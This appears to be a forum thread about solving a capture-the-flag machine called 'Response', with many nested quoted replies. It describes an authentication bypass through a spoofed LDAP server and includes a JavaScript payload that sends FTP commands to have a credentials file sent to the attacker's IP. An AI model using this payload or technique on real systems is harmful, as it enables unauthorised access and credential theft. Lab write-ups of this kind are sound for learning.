(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?

How do you interact with the chat app, because it needs js enabled and is not accessible from outside the machine, you can get to the page only from the vuln with the digest stuff, I am at the zip point but cannot find anything interesting apart from the gu***:gu*** creds

(May 27, 2022, 11:34 AM)pacholingoso Wrote:

(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?

How do you interact with the chat app, because it needs js enabled and is not accessible from outside the machine, you can get to the page only from the vuln with the digest stuff, I am at the zip point but cannot find anything interesting apart from the gu***:gu*** creds

I wrote a Python script with a port listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then send the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.

(May 27, 2022, 06:21 PM)Exa Wrote:

(May 27, 2022, 11:34 AM)pacholingoso Wrote:

(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?

How do you interact with the chat app, because it needs js enabled and is not accessible from outside the machine, you can get to the page only from the vuln with the digest stuff, I am at the zip point but cannot find anything interesting apart from the gu***:gu*** creds

I wrote a Python script with a post listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then send the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.

Do you have an application in your browser? i wrote the code to interact with that, lol. as a result to be authorized under username admin. I got strange access cred for ftp, but I can not connect to it

(May 27, 2022, 09:16 PM)vitalykht Wrote:

(May 27, 2022, 06:21 PM)Exa Wrote:

(May 27, 2022, 11:34 AM)pacholingoso Wrote:

(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?

How do you interact with the chat app, because it needs js enabled and is not accessible from outside the machine, you can get to the page only from the vuln with the digest stuff, I am at the zip point but cannot find anything interesting apart from the gu***:gu*** creds

I wrote a Python script with a post listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then send the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.

Do you have an application in your browser? i wrote the code to interact with that, lol. as a result to be authorized under username admin. I got strange access cred for ftp, but I can not connect to it

To be authorized as admin, I intercepted the login request with Burp and changed the authserver to my own IP. For the incoming connection on port 389 I setup an LDAP server to approve that authentication attempt.

Answering "yes" to bob, he gives the IP address and credentials for an FTP server.

Is it possible to download files via FTP using JavaScript?

(May 29, 2022, 01:06 PM)Internetdreams Wrote: https://www.serv-u.com/resource/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command#:~:text=PORT%20FTP%20command-,PORT%20FTP%20command,during%20%22active%22%20mode%20transfers

---

(May 29, 2022, 10:09 AM)Exa Wrote: Answering "yes" to bob, he gives the IP address and credentials for an FTP server.

Is it possible to download files via FTP using JavaScript?

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://ip:port/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
    if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
    }
}
xhr.send("USER ftpusername 
PASS ftppassword
PORT 10,10,14,12,19,15
RETR credentials.txt
");
</script>

Thanks a lot, that worked! I really appreciate your help.

For a directory listing, I sent the LIST command instead of the RETR command.
In a second run, I sent RETR creds.txt.

(May 29, 2022, 01:06 PM)Internetdreams Wrote: https://www.serv-u.com/resource/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command#:~:text=PORT%20FTP%20command-,PORT%20FTP%20command,during%20%22active%22%20mode%20transfers

---

(May 29, 2022, 10:09 AM)Exa Wrote: Answering "yes" to bob, he gives the IP address and credentials for an FTP server.

Is it possible to download files via FTP using JavaScript?

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://ip:port/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
    if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
    }
}
xhr.send("USER ftpusername 
PASS ftppassword
PORT 10,10,14,12,19,15
RETR credentials.txt
");
</script>

Oh appreciate, thank you, i totally forget that way.

Anyone have progress on Response root ?

(May 27, 2022, 06:21 PM)Exa Wrote:

(May 27, 2022, 11:34 AM)pacholingoso Wrote:

(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?

How do you interact with the chat app, because it needs js enabled and is not accessible from outside the machine, you can get to the page only from the vuln with the digest stuff, I am at the zip point but cannot find anything interesting apart from the gu***:gu*** creds

I wrote a Python script with a port listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then send the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.

I also created a Python Script to redirect the traffic to the proxy but i am having issues with the WebSocket Upgrade. I can see three requests being made but the last one fails with: unknown Session ID...

Also: it seems like the POST request is always returning ok, even putting trash in...

(June 5, 2022, 02:53 AM)F4nny Wrote: Anyone have progress on Response root ?

Hey Man Im Stuck In The Chat.response.htb I Can't Access Can You Tell Me How You Get The url_digest ?